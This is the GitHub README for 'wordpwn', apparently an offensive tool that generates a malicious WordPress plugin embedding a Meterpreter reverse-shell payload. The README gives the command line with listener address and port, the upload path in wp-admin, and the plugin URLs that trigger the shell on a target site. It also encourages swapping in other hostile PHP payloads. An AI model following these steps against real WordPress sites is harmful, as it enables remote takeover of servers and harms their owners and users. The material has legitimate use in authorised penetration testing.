Skip to content
master
Go to file
Code

Files

Permalink
Failed to load latest commit information.

README.md

Malicious WordPress plugin

This utility simply generates a WordPress plugin that will grant you a reverse shell once uploaded. I recommend installing Kali Linux, as MSFvenom is used to generate the payload.

It goes without mentioning that in order for this method to be effective, you must have credentials to a valid User account, with rights to add plugins to the WordPress website ;)

Usage Example

root@wetw0rk:~# python wordpwn.py
__        __            _
\ \      / /__  _ __ __| |_ ____      ___ __
 \ \ /\ / / _ \|  __/ _  |  _ \ \ /\ / /  _ \
  \ V  V / (_) | | | (_| | |_) \ V  V /| | | |
   \_/\_/ \___/|_|  \__,_| .__/ \_/\_/ |_| |_|
                         |_|


Usage: wordpwn.py [LHOST] [LPORT] [HANDLER]
Example: wordpwn.py 192.168.0.6 8888 Y

How and When do I use this?

Usage is super simple, simply pass wordpwn your listening address and listening port and execute the script. You are also given the option to start a handler, I recommend that you do... since by default the plugin will be made using a php/meterpreter/reverse_tcp reverse shell.If you have your own nefarious PHP payload simply adjust the script to accept it.

After the script is ran, a zip file (the plugin) called malicious.zip will be created in the current directory (and a handler will be started if you specified it with the Y option). Upload this zip file as a new plugin (by browsing to the URL http://(target)/wp-admin/plugin-install.php?tab=upload). Once uploaded, you have to activate the plugin.

Be sure to start our listener (if you didn't specify the handler with the Y option) !

Once the plugin installed and activated, just navigate to the following URLs to launch the reverse shell :

  • http://(target)/wp-content/plugins/malicious/wetw0rk_maybe.php
  • http://(target)/wp-content/plugins/malicious/QwertyRocks.php

Note: if the script usage is still a mystery to you, JavaRockstar has made a tutorial on his website HackingVision about it.

PLEASE READ

I want to be 100% sure that I give credit to Rob Carr. Rob Carr is the author of the Metasploit module wp_admin_shell_upload, which this script is based on. You can find more information on his module at Rapid7 .

About

Simply generates a wordpress plugin that will grant you a reverse shell once uploaded. I recommend installing Kali Linux, as msfvenom is used to generate the payload.

Resources

License

Releases

No releases published

Packages

No packages published

Languages

You can’t perform that action at this time.